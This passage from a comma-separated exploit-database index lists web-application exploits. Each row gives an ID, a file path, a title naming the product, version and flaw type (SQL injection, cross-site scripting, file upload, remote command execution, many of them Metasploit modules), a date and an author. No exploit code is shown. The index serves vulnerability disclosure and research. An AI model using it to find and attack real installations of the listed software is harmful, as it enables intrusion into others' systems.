1.7.3 - Multiple POST SQL Injections",2011-02-12,LiquidWorm,php,webapps, -16170,exploits/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 - SQL Injection",2011-02-15,#forkbombers,php,webapps, -16171,exploits/cfm/webapps/16171.py,"Lingxia I.C.E CMS - Blind SQL Injection",2011-02-15,mr_me,cfm,webapps, -16172,exploits/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps, -16175,exploits/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps, -16178,exploits/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps, -16179,exploits/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps, -16181,exploits/php/webapps/16181.txt,"WordPress Plugin User Photo Component - Arbitrary File Upload",2011-02-17,ADVtools,php,webapps, -16225,exploits/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps, -16196,exploits/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Persistent Cross-Site Scripting",2011-02-19,"Saif El-Sherei",php,webapps, -16197,exploits/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps, -16198,exploits/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps, -16199,exploits/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a - HTTP Referer Persistent Cross-Site Scripting",2011-02-20,"Saif El-Sherei",php,webapps, -16200,exploits/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution",2011-02-20,mr_me,php,webapps, -16201,exploits/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection",2011-02-20,mr_me,php,webapps, -16202,exploits/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon - 'hilfsmittel.php' SQL Injection",2011-02-21,Crazyball,php,webapps, -16205,exploits/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps, -16206,exploits/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps, -16207,exploits/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps, -16222,exploits/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps, -16223,exploits/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps, -16220,exploits/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",php,webapps, -16218,exploits/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps, -16213,exploits/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,php,webapps, -16214,exploits/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,php,webapps, -16217,exploits/php/webapps/16217.txt,"Bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps, -16232,exploits/php/webapps/16232.txt,"WordPress Plugin GigPress 2.1.10 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps, -16233,exploits/php/webapps/16233.txt,"WordPress Plugin Relevanssi 2.7.2 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps, -16235,exploits/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",php,webapps, -16236,exploits/php/webapps/16236.txt,"WordPress Plugin IWantOneButton 3.0.1 - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps, -16241,exploits/asp/webapps/16241.txt,"RaksoCT - Multiple SQL Injections",2011-02-25,p0pc0rn,asp,webapps, -16246,exploits/php/webapps/16246.py,"Joomla! Component com_xcloner-backupandrestore - Remote Command Execution",2011-02-25,mr_me,php,webapps, -16247,exploits/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy & Abhishek Lyall",php,webapps, -16249,exploits/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps, -16250,exploits/php/webapps/16250.txt,"WordPress Plugin jQuery Mega Menu 1.0 - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps, -16251,exploits/php/webapps/16251.txt,"WordPress Plugin OPS Old Post Spinner 2.2.1 - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps, -16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps, -16256,exploits/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps, -16257,exploits/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps, -16265,exploits/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone & Zooka & El3arby",php,webapps, -16266,exploits/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,php,webapps, -16267,exploits/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps, -16268,exploits/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps, -16273,exploits/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - 'admin_container.php' Remote Code Execution",2011-03-04,mr_me,php,webapps, -16274,exploits/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution",2011-03-04,kingcope,jsp,webapps, -16276,exploits/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps, -16279,exploits/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps, -16280,exploits/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps, -16281,exploits/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps, -41784,exploits/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps, -16313,exploits/php/webapps/16313.rb,"FreeNAS - 'exec_raw.php' Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps, -41801,exploits/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps, -41802,exploits/multiple/webapps/41802.html,"Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps, -41803,exploits/multiple/webapps/41803.html,"Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps, -41799,exploits/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps, -41800,exploits/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps, -16788,exploits/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps, -16856,exploits/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps, -16857,exploits/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps, -16858,exploits/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - 'passwd.php3' Arbitrary Command Execution (Metasploit)",2010-10-18,Metasploit,php,webapps, -41782,exploits/hardware/webapps/41782.txt,"Zyxel_ EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection",2017-04-02,"trevor Hough",hardware,webapps, -16881,exploits/php/webapps/16881.rb,"Cacti - 'graph_view.php' Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16882,exploits/php/webapps/16882.rb,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps, -16883,exploits/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps, -16885,exploits/php/webapps/16885.rb,"TikiWiki jhot - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps, -16886,exploits/cgi/webapps/16886.rb,"AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps, -16889,exploits/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit)",2011-01-08,Metasploit,linux,webapps, -16890,exploits/php/webapps/16890.rb,"phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16891,exploits/cgi/webapps/16891.rb,"QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps, -16892,exploits/php/webapps/16892.rb,"TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16893,exploits/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution (Metasploit)",2010-04-30,Metasploit,cgi,webapps, -16894,exploits/php/webapps/16894.rb,"TWiki - Search Function Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16895,exploits/php/webapps/16895.rb,"WordPress 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16896,exploits/php/webapps/16896.rb,"vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps, -16897,exploits/php/webapps/16897.rb,"BASE - 'base_qry_common' Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps, -16899,exploits/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16901,exploits/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,php,webapps, -16902,exploits/php/webapps/16902.rb,"CakePHP 1.3.5/1.2.8 - Cache Corruption (Metasploit)",2011-01-14,Metasploit,php,webapps, -16904,exploits/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps, -16905,exploits/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps, -16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps, -16907,exploits/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps, -16908,exploits/cgi/webapps/16908.rb,"Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps, -16909,exploits/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - 'picEditor.php' Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16911,exploits/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps, -16912,exploits/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps, -16913,exploits/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection (Metasploit)",2010-07-03,Metasploit,php,webapps, -16914,exploits/cgi/webapps/16914.rb,"The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps, -16917,exploits/php/webapps/16917.rb,"Dogfood CRM - 'spell.php' Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps, -16923,exploits/hardware/webapps/16923.rb,"ContentKeeper Web - Remote Command Execution (Metasploit)",2010-10-09,Metasploit,hardware,webapps, -16931,exploits/php/webapps/16931.html,"N-13 News 4.0 - Cross-Site Request Forgery (Add Admin)",2011-03-06,AtT4CKxT3rR0r1ST,php,webapps, -16946,exploits/php/webapps/16946.txt,"Ruubikcms 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps, -16933,exploits/php/webapps/16933.txt,"Quick Polls - Local File Inclusion / Deletion",2011-03-06,"Mark Stanislav",php,webapps, -16934,exploits/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x - SQL Injection",2011-03-06,DSecurity,php,webapps, -16935,exploits/php/webapps/16935.txt,"Bacula-Web 1.3.x < 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps, -16937,exploits/php/webapps/16937.pl,"EggAvatar 2.3.2 for vBulletin 3.8.x - Local File Read",2011-03-07,DSecurity,php,webapps, -16938,exploits/php/webapps/16938.txt,"BMForum Myna 6.0 - SQL Injection",2011-03-07,"Stephan Sattler",php,webapps, -16941,exploits/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps, -16947,exploits/php/webapps/16947.txt,"WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps, -16948,exploits/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps, -16949,exploits/php/webapps/16949.php,"Maian Weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps, -16950,exploits/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps, -16953,exploits/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps, -16954,exploits/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps, -16955,exploits/asp/webapps/16955.txt,"SmarterMail 7.3/7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps, -16959,exploits/multiple/webapps/16959.txt,"Oracle WebLogic - POST Session Fixation",2011-03-11,"Roberto Suggi Liverani",multiple,webapps, -16961,exploits/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code",2011-03-11,TecR0c,php,webapps, -16962,exploits/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps, -16963,exploits/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps, -16968,exploits/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps, -16969,exploits/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps, -16975,exploits/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps, -16980,exploits/php/webapps/16980.py,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps, -16982,exploits/php/webapps/16982.txt,"LotusCMS 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps, -16987,exploits/php/webapps/16987.txt,"pointter PHP content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps, -16988,exploits/php/webapps/16988.txt,"WikiWig 5.01 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps, -16989,exploits/php/webapps/16989.txt,"b2evolution 4.0.3 - Persistent Cross-Site Scripting",2011-03-16,"AutoSec Tools",php,webapps, -16992,exploits/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injections",2011-03-17,"Aung Khant",php,webapps, -16995,exploits/php/webapps/16995.txt,"Joomla! Component com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps, -16997,exploits/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps, -17000,exploits/php/webapps/17000.txt,"Tugux CMS - 'nid' Blind SQL Injection",2011-03-18,eidelweiss,php,webapps, -17002,exploits/php/webapps/17002.txt,"CMS Loko Media - Local File Download",2011-03-18,Xr0b0t,php,webapps, -17003,exploits/php/webapps/17003.py,"iCMS 1.1 - Admin SQL Injection / Brute Force",2011-03-18,TecR0c,php,webapps, -17005,exploits/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary File Upload",2011-03-19,Xr0b0t,php,webapps, -17006,exploits/php/webapps/17006.txt,"Balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps, -17007,exploits/php/webapps/17007.txt,"Phpbuddies - Arbitrary File Upload",2011-03-19,Xr0b0t,php,webapps, -17009,exploits/php/webapps/17009.txt,"CMS Balitbang 3.3 - Arbitrary File Upload",2011-03-19,eidelweiss,php,webapps, -17011,exploits/asp/webapps/17011.txt,"Douran 3.9.7.8 - File Download/Source Code Disclosure",2011-03-20,"AJAX Security Team",asp,webapps, -17014,exploits/php/webapps/17014.txt,"CMS Lokomedia 1.5 - Arbitrary File Upload",2011-03-21,eidelweiss,php,webapps, -17015,exploits/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 - Arbitrary File Upload",2011-03-21,"Daniel Godoy",asp,webapps, -17016,exploits/asp/webapps/17016.txt,"EAFlashUpload 2.5 - Arbitrary File Upload",2011-03-21,"Daniel Godoy",asp,webapps, -17018,exploits/php/webapps/17018.txt,"Shimbi CMS - Multiple SQL Injections",2011-03-21,p0pc0rn,php,webapps, -17026,exploits/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI - HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps, -17035,exploits/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps, -17036,exploits/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps, -17046,exploits/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps, -17050,exploits/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps, -17051,exploits/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps, -17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps, -17055,exploits/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps, -17056,exploits/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution",2011-03-28,"Sense of Security",php,webapps, -17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,php,webapps, -17061,exploits/php/webapps/17061.txt,"Andy's PHP KnowledgeBase 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps, -17062,exploits/php/webapps/17062.txt,"Claroline 1.10 - Persistent Cross-Site Scripting",2011-03-29,"AutoSec Tools",php,webapps, -17069,exploits/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps, -17076,exploits/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps, -17077,exploits/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps, -17079,exploits/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps, -17080,exploits/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps, -17081,exploits/asp/webapps/17081.txt,"CosmoQuest - Authentication Bypass",2011-03-30,Net.Edit0r,asp,webapps, -17084,exploits/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection",2011-03-30,"Mark Stanislav",php,webapps, -17085,exploits/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps, -17091,exploits/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (2)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps, -17092,exploits/php/webapps/17092.html,"Allomani News 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps, -17093,exploits/php/webapps/17093.html,"Allomani Movies Library 2.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps, -17094,exploits/php/webapps/17094.html,"Allomani Web Links 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps, -17095,exploits/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps, -17096,exploits/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps, -17123,exploits/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps, -17098,exploits/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps, -17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps, -17100,exploits/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php?id' SQL Injection",2011-04-02,"Easy Laster",php,webapps, -17101,exploits/php/webapps/17101.txt,"ilchClan 1.0.5 - 'regist.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps, -17102,exploits/php/webapps/17102.txt,"Anzeigenmarkt 2011 - 'index.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps, -17103,exploits/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - 'index.php' SQL Injection",2011-04-03,keracker,php,webapps, -17106,exploits/php/webapps/17106.txt,"Rash CMS - SQL Injection",2011-04-03,keracker,php,webapps, -17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,php,webapps, -17108,exploits/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusions",2011-04-03,KedAns-Dz,php,webapps, -17431,exploits/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection",2011-06-22,"Number 7",php,webapps, -17110,exploits/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-04-04,LiquidWorm,php,webapps, -17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",multiple,webapps, -17112,exploits/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps, -17113,exploits/hardware/webapps/17113.txt,"TP-Link TL-PS110U / TL-PS110P - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps, -17114,exploits/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps, -17115,exploits/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps, -17116,exploits/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps, -17117,exploits/hardware/webapps/17117.txt,"Planet FPS-1101 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps, -17118,exploits/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps, -17119,exploits/php/webapps/17119.txt,"WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion",2011-04-05,"AutoSec Tools",php,webapps, -17125,exploits/php/webapps/17125.txt,"Dream Vision Technologies Web Portal - SQL Injection",2011-04-06,eXeSoul,php,webapps, -17126,exploits/php/webapps/17126.html,"Graugon Forum 1.3 - SQL Injection",2011-04-06,"AutoSec Tools",php,webapps, -17127,exploits/php/webapps/17127.txt,"eyeos 2.3 - Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps, -17128,exploits/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps, -17129,exploits/php/webapps/17129.txt,"S40 CMS 0.4.2b - Local File Inclusion",2011-04-07,Osirys,php,webapps, -17132,exploits/php/webapps/17132.py,"Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c & mr_me",php,webapps, -17134,exploits/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps, -17135,exploits/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps, -17136,exploits/php/webapps/17136.txt,"Joomla! Component joomlacontenteditor - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps, -17137,exploits/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,php,webapps, -17178,exploits/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps, -17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps, -17180,exploits/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps, -17141,exploits/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps, -17146,exploits/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps, -17165,exploits/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection / Full Path Disclosure",2011-04-13,swami,php,webapps, -17170,exploits/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection",2011-04-14,Osirys,php,webapps, -17172,exploits/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps, -17173,exploits/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps, -17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps, -17176,exploits/asp/webapps/17176.txt,"SoftXMLCMS - Arbitrary File Upload",2011-04-16,Alexander,asp,webapps, -17183,exploits/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,vir0e5,php,webapps, -17197,exploits/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps, -17198,exploits/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps, -17190,exploits/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps, -17191,exploits/php/webapps/17191.txt,"Ultimate eShop - Error-Based SQL Injection",2011-04-20,Romka,php,webapps, -17192,exploits/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-20,LiquidWorm,php,webapps, -17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,php,webapps, -17200,exploits/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 - x-forwarded-for HTTP Header Persistent Cross-Site Scripting",2011-04-22,Saif,php,webapps, -17202,exploits/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec 